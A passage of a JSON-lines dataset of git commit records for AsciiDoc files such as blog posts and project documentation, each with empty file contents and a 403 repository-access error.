parser-xml","repos":"jerr\/jbossforge-core,forge\/core,forge\/core,oscerd\/core,agoncal\/core,D9110\/core,ivannov\/core,stalep\/forge-core,D9110\/core,oscerd\/core,D9110\/core,ivannov\/core,jerr\/jbossforge-core,pplatek\/core,oscerd\/core,forge\/core,jerr\/jbossforge-core,D9110\/core,ivannov\/core,jerr\/jbossforge-core,D9110\/core,D9110\/core,ivannov\/core,stalep\/forge-core,agoncal\/core,oscerd\/core,ivannov\/core,jerr\/jbossforge-core,D9110\/core,ivannov\/core,pplatek\/core,ivannov\/core,forge\/core,agoncal\/core,pplatek\/core,D9110\/core,pplatek\/core,agoncal\/core,agoncal\/core,agoncal\/core,pplatek\/core,pplatek\/core,oscerd\/core,forge\/core,forge\/core,pplatek\/core,D9110\/core,forge\/core,agoncal\/core,oscerd\/core,pplatek\/core,pplatek\/core,forge\/core,oscerd\/core,D9110\/core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,jerr\/jbossforge-core,oscerd\/core,agoncal\/core,oscerd\/core,forge\/core,ivannov\/core,agoncal\/core,ivannov\/core,jerr\/jbossforge-core,oscerd\/core,agoncal\/core,ivannov\/core,jerr\/jbossforge-core,pplatek\/core","old_file":"parser-xml\/README.asciidoc","new_file":"parser-xml\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3e07277230f71a880cf0aa07fd32a1f2d6811abb","subject":"Update 2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 
2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3912805c4d597176028fabc4f635adabcbe63c0a","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/09\/03\/deref.adoc","new_file":"content\/news\/2021\/09\/03\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"81580d6d27df616709453e526cfe6fa32a468a81","subject":"y2b create post Bluetooth + Hot shower = ?","message":"y2b create post Bluetooth + Hot shower = ?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-22-Bluetooth--Hot-shower--.adoc","new_file":"_posts\/2013-06-22-Bluetooth--Hot-shower--.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc4784f6e8a9a91954cb50871494f24960912000","subject":"Forge 3.1.0.Final announcement","message":"Forge 3.1.0.Final announcement\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-04-15-forge-3.1.0.final.asciidoc","new_file":"news\/2016-04-15-forge-3.1.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f61535f3c708b7dc46dbbddfacd0fa2a486ddfb9","subject":"y2b create post Bioshock Infinite Premium Edition Unboxing \\u0026 Overview","message":"y2b create post Bioshock Infinite Premium Edition Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-26-Bioshock-Infinite-Premium-Edition-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-03-26-Bioshock-Infinite-Premium-Edition-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dacaef09816322a1dbf5790f8a38c194806f7b0d","subject":"Update 2015-05-23-Hello-World.adoc","message":"Update 2015-05-23-Hello-World.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-23-Hello-World.adoc","new_file":"_posts\/2015-05-23-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ce0972271b331795c55df47e69a511396537914","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e54ab7c8e9abac11c2b733073694d9e2da14df02","subject":"Update 2016-07-22-Mo-te-passa.adoc","message":"Update 2016-07-22-Mo-te-passa.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-Mo-te-passa.adoc","new_file":"_posts\/2016-07-22-Mo-te-passa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6b9fc72ef9fcf24c26018eb9a8af19b86307880","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47434431936bb176f7937f1afc227732757d5fe","subject":"doc: users-guide: add packet marking documentation","message":"doc: users-guide: add packet marking documentation\n\nUpdates packet marking api documentation to traffic manager user guide\n\nSigned-off-by: Balasubramanian Manoharan <affd9aba178b6c6e9aaff69252817fd03d71ae35@linaro.org>\nReviewed-and-tested-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"dkrot\/odp,ravineet-singh\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,nmorey\/odp,nmorey\/odp,nmorey\/odp,dkrot\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,nmorey\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,erachmi\/odp,erachmi\/odp,mike-holmes-linaro\/odp","old_file":"doc\/users-guide\/users-guide-tm.adoc","new_file":"doc\/users-guide\/users-guide-tm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"0c610afc9d3c6ac312afdc393b4f82cef517fc35","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 
2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef26a9268a0b04b68e5407226d629546978f69eb","subject":"y2b create post GTA V Collector's Edition Unboxing + Special Edition Unboxing!","message":"y2b create post GTA V Collector's Edition Unboxing + Special Edition Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-17-GTA-V-Collectors-Edition-Unboxing--Special-Edition-Unboxing.adoc","new_file":"_posts\/2013-09-17-GTA-V-Collectors-Edition-Unboxing--Special-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf96bc3d05efa196a7e34ed9e41aa05eeb696fd9","subject":"URL prec","message":"URL prec\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8b44a3b76e34f485a9d3ef8d943691621b4ae3a","subject":"Update 2016-02-15-Just-some-pictures-of-the-RaspberryPi-Cluster-setup.adoc","message":"Update 2016-02-15-Just-some-pictures-of-the-RaspberryPi-Cluster-setup.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-02-15-Just-some-pictures-of-the-RaspberryPi-Cluster-setup.adoc","new_file":"_posts\/2016-02-15-Just-some-pictures-of-the-RaspberryPi-Cluster-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5106ef093c6b7d841bb581a27329f2c30e95859a","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud-incubator\/spring-cloud-kubernetes","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-incubator\/spring-cloud-kubernetes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b21fdfe8c638ee15a9dd1723037a440c3275b54b","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-aws","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/spring-cloud\/spring-cloud-aws.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7965ed397e0464911fa7046c7134516a2dd736d","subject":"Update 2019-03-22-A-W-S-C-L-I.adoc","message":"Update 2019-03-22-A-W-S-C-L-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28000e1c034e014557d3bd45fc06de4c45ba7cb4","subject":"Update 2015-10-17-Finding-all-intances-of-formatted-text-in-document-using-C.adoc","message":"Update 2015-10-17-Finding-all-intances-of-formatted-text-in-document-using-C.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Finding-all-intances-of-formatted-text-in-document-using-C.adoc","new_file":"_posts\/2015-10-17-Finding-all-intances-of-formatted-text-in-document-using-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f494fe9f0feb65ee47a29e4f7c76d6bc00a62299","subject":"add content for querying raw data","message":"add content for querying raw data\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1355cb44057d2e4435f4366fcb02cbccfaf2183f","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-consul,spring-cloud\/spring-cloud-consul,spring-cloud\/spring-cloud-consul","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-consul.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9e804ed7575d30ced0e7bf28f5ab20119c1f9e4","subject":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Publish 
2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32e6f0ff55664411225f12b4dee19d5a1cb910c0","subject":"Update 2017-11-17-My-thoughts-on-42-the-last-4-months-and-what-Im-looking-forward-to.adoc","message":"Update 2017-11-17-My-thoughts-on-42-the-last-4-months-and-what-Im-looking-forward-to.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-11-17-My-thoughts-on-42-the-last-4-months-and-what-Im-looking-forward-to.adoc","new_file":"_posts\/2017-11-17-My-thoughts-on-42-the-last-4-months-and-what-Im-looking-forward-to.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ee31b89eb1aada5016c5d339d62f294ed788a81","subject":"Update 2019-07-20-Learning-Data-Augmentation-Strategies-for-Object-Detection.adoc","message":"Update 2019-07-20-Learning-Data-Augmentation-Strategies-for-Object-Detection.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-07-20-Learning-Data-Augmentation-Strategies-for-Object-Detection.adoc","new_file":"_posts\/2019-07-20-Learning-Data-Augmentation-Strategies-for-Object-Detection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb7924570fcfdbb3146fde31a81a0b8143d2971a","subject":"initial cut of \"friendly\" release notes for 2.6.0","message":"initial cut of \"friendly\" release notes for 2.6.0\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.6.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"421083b0f6d34773b65148358a1e4b84620db558","subject":"Update 2016-08-11-Test.adoc","message":"Update 2016-08-11-Test.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-11-Test.adoc","new_file":"_posts\/2016-08-11-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb00d491177dc30b8a3e953ea0913c3973ec7610","subject":"Publish 2016-12-2-3-Dpen.adoc","message":"Publish 
2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b74d0cc2c1193479376fe5efb64eee123c7c6b46","subject":"Update 2018-01-14-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-14-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-14-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-14-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d75bfd09482a524ed7b0cffb055414ee9ac8e3e","subject":"Update 2015-12-22-Authentication-and-authorization-using-Auth0-and-Vertx.adoc","message":"Update 2015-12-22-Authentication-and-authorization-using-Auth0-and-Vertx.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-12-22-Authentication-and-authorization-using-Auth0-and-Vertx.adoc","new_file":"_posts\/2015-12-22-Authentication-and-authorization-using-Auth0-and-Vertx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a059a6574a1c270ccc28ddec1671888fb0cfba28","subject":"Update reverse-nested-aggregation.asciidoc","message":"Update reverse-nested-aggregation.asciidoc\n\nFixed reverse nested example\n\nCloses 
#7463\n","repos":"geidies\/elasticsearch,StefanGor\/elasticsearch,mjhennig\/elasticsearch,phani546\/elasticsearch,huanzhong\/elasticsearch,pozhidaevak\/elasticsearch,kaneshin\/elasticsearch,pranavraman\/elasticsearch,nilabhsagar\/elasticsearch,dataduke\/elasticsearch,JackyMai\/elasticsearch,janmejay\/elasticsearch,mmaracic\/elasticsearch,markllama\/elasticsearch,Stacey-Gammon\/elasticsearch,markllama\/elasticsearch,Asimov4\/elasticsearch,sreeramjayan\/elasticsearch,thecocce\/elasticsearch,geidies\/elasticsearch,tsohil\/elasticsearch,ajhalani\/elasticsearch,achow\/elasticsearch,codebunt\/elasticsearch,dataduke\/elasticsearch,a2lin\/elasticsearch,tsohil\/elasticsearch,amit-shar\/elasticsearch,lightslife\/elasticsearch,Ansh90\/elasticsearch,kcompher\/elasticsearch,s1monw\/elasticsearch,kkirsche\/elasticsearch,winstonewert\/elasticsearch,markllama\/elasticsearch,pablocastro\/elasticsearch,sarwarbhuiyan\/elasticsearch,hanswang\/elasticsearch,acchen97\/elasticsearch,springning\/elasticsearch,jango2015\/elasticsearch,JervyShi\/elasticsearch,boliza\/elasticsearch,henakamaMSFT\/elasticsearch,alexkuk\/elasticsearch,nilabhsagar\/elasticsearch,queirozfcom\/elasticsearch,andrestc\/elasticsearch,fforbeck\/elasticsearch,jprante\/elasticsearch,avikurapati\/elasticsearch,smflorentino\/elasticsearch,javachengwc\/elasticsearch,smflorentino\/elasticsearch,hirdesh2008\/elasticsearch,mnylen\/elasticsearch,robin13\/elasticsearch,Kakakakakku\/elasticsearch,sjohnr\/elasticsearch,Helen-Zhao\/elasticsearch,jw0201\/elastic,Collaborne\/elasticsearch,ajhalani\/elasticsearch,bawse\/elasticsearch,JervyShi\/elasticsearch,sjohnr\/elasticsearch,zkidkid\/elasticsearch,apepper\/elasticsearch,micpalmia\/elasticsearch,pritishppai\/elasticsearch,ivansun1010\/elasticsearch,franklanganke\/elasticsearch,kalburgimanjunath\/elasticsearch,EasonYi\/elasticsearch,opendatasoft\/elasticsearch,LeoYao\/elasticsearch,sreeramjayan\/elasticsearch,kimimj\/elasticsearch,lydonchandra\/elasticsearch,cnfire\/elasticsearch-1,brandonkearby\/elasticsearch,ricardocerq\/elasticsearch,zhiqinghuang\/elasticsearch,kalburgimanjunath\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,dylan8902\/elasticsearch,mortonsykes\/elasticsearch,strapdata\/elassandra5-rc,njlawton\/elasticsearch,humandb\/elasticsearch,ESamir\/elasticsearch,wangtuo\/elasticsearch,pritishppai\/elasticsearch,mgalushka\/elasticsearch,winstonewert\/elasticsearch,acchen97\/elasticsearch,vroyer\/elassandra,sposam\/elasticsearch,jprante\/elasticsearch,truemped\/elasticsearch,robin13\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,iamjakob\/elasticsearch,episerver\/elasticsearch,mjason3\/elasticsearch,Siddartha07\/elasticsearch,ckclark\/elasticsearch,onegambler\/elasticsearch,Brijeshrpatel9\/elasticsearch,Widen\/elasticsearch,wangtuo\/elasticsearch,gmarz\/elasticsearch,Collaborne\/elasticsearch,nrkkalyan\/elasticsearch,rajanm\/elasticsearch,iamjakob\/elasticsearch,MisterAndersen\/elasticsearch,mm0\/elasticsearch,jbertouch\/elasticsearch,chirilo\/elasticsearch,Charlesdong\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Shepard1212\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nomoa\/elasticsearch,pablocastro\/elasticsearch,hafkensite\/elasticsearch,F0lha\/elasticsearch,strapdata\/elassandra-test,Liziyao\/elasticsearch,caengcjd\/elasticsearch,Stacey-Gammon\/elasticsearch,MichaelLiZhou\/elasticsearch,mohit\/elasticsearch,rento19962\/elasticsearch,robin13\/elasticsearch,lchennup\/elasticsearch,winstonewert\/elasticsearch,mcku\/elasticsearch,mortonsykes\/elasticsearch,luiseduardohdb
ackup\/elasticsearch,hafkensite\/elasticsearch,infusionsoft\/elasticsearch,sc0ttkclark\/elasticsearch,adrianbk\/elasticsearch,andrejserafim\/elasticsearch,zhiqinghuang\/elasticsearch,wangyuxue\/elasticsearch,pritishppai\/elasticsearch,knight1128\/elasticsearch,mjhennig\/elasticsearch,fred84\/elasticsearch,himanshuag\/elasticsearch,gfyoung\/elasticsearch,wbowling\/elasticsearch,kunallimaye\/elasticsearch,zeroctu\/elasticsearch,nknize\/elasticsearch,dataduke\/elasticsearch,vroyer\/elasticassandra,IanvsPoplicola\/elasticsearch,kenshin233\/elasticsearch,abibell\/elasticsearch,zkidkid\/elasticsearch,chrismwendt\/elasticsearch,javachengwc\/elasticsearch,glefloch\/elasticsearch,Kakakakakku\/elasticsearch,dataduke\/elasticsearch,naveenhooda2000\/elasticsearch,alexkuk\/elasticsearch,anti-social\/elasticsearch,rmuir\/elasticsearch,dongjoon-hyun\/elasticsearch,overcome\/elasticsearch,kubum\/elasticsearch,artnowo\/elasticsearch,karthikjaps\/elasticsearch,karthikjaps\/elasticsearch,JSCooke\/elasticsearch,palecur\/elasticsearch,hanswang\/elasticsearch,xuzha\/elasticsearch,chrismwendt\/elasticsearch,lightslife\/elasticsearch,elancom\/elasticsearch,likaiwalkman\/elasticsearch,jw0201\/elastic,combinatorist\/elasticsearch,adrianbk\/elasticsearch,feiqitian\/elasticsearch,mbrukman\/elasticsearch,hanswang\/elasticsearch,Charlesdong\/elasticsearch,diendt\/elasticsearch,HarishAtGitHub\/elasticsearch,mjason3\/elasticsearch,tsohil\/elasticsearch,drewr\/elasticsearch,umeshdangat\/elasticsearch,weipinghe\/elasticsearch,yuy168\/elasticsearch,vrkansagara\/elasticsearch,ThalaivaStars\/OrgRepo1,yanjunh\/elasticsearch,jw0201\/elastic,davidvgalbraith\/elasticsearch,masaruh\/elasticsearch,Kakakakakku\/elasticsearch,ivansun1010\/elasticsearch,queirozfcom\/elasticsearch,jchampion\/elasticsearch,caengcjd\/elasticsearch,fooljohnny\/elasticsearch,andrestc\/elasticsearch,szroland\/elasticsearch,phani546\/elasticsearch,obourgain\/elasticsearch,jimczi\/elasticsearch,pritishppai\/elasticsearch,avikurapati\/elasticsearch,jimhooker2002\/elasticsearch,LewayneNaidoo\/elasticsearch,vroyer\/elassandra,luiseduardohdbackup\/elasticsearch,zkidkid\/elasticsearch,alexbrasetvik\/elasticsearch,JackyMai\/elasticsearch,pablocastro\/elasticsearch,aglne\/elasticsearch,sdauletau\/elasticsearch,hechunwen\/elasticsearch,andrestc\/elasticsearch,wayeast\/elasticsearch,MaineC\/elasticsearch,kenshin233\/elasticsearch,gfyoung\/elasticsearch,ZTE-PaaS\/elasticsearch,yongminxia\/elasticsearch,cnfire\/elasticsearch-1,coding0011\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,jaynblue\/elasticsearch,vvcephei\/elasticsearch,apepper\/elasticsearch,rmuir\/elasticsearch,robin13\/elasticsearch,hirdesh2008\/elasticsearch,C-Bish\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,rajanm\/elasticsearch,iantruslove\/elasticsearch,Asimov4\/elasticsearch,mnylen\/elasticsearch,vingupta3\/elasticsearch,jprante\/elasticsearch,awislowski\/elasticsearch,sreeramjayan\/elasticsearch,awislowski\/elasticsearch,rlugojr\/elasticsearch,iacdingping\/elasticsearch,onegambler\/elasticsearch,mikemccand\/elasticsearch,gmarz\/elasticsearch,springning\/elasticsearch,alexshadow007\/elasticsearch,mmaracic\/elasticsearch,infusionsoft\/elasticsearch,masterweb121\/elasticsearch,queirozfcom\/elasticsearch,dataduke\/elasticsearch,Siddartha07\/elasticsearch,KimTaehee\/elasticsearch,Siddartha07\/elasticsearch,koxa29\/elasticsearch,yongminxia\/elasticsearch,Clairebi\/ElasticsearchClone,overcome\/elasticsearch,linglaiyao1314\/elasticsearch,ulkas\/elasticsearch,MetSystem\/elasticse
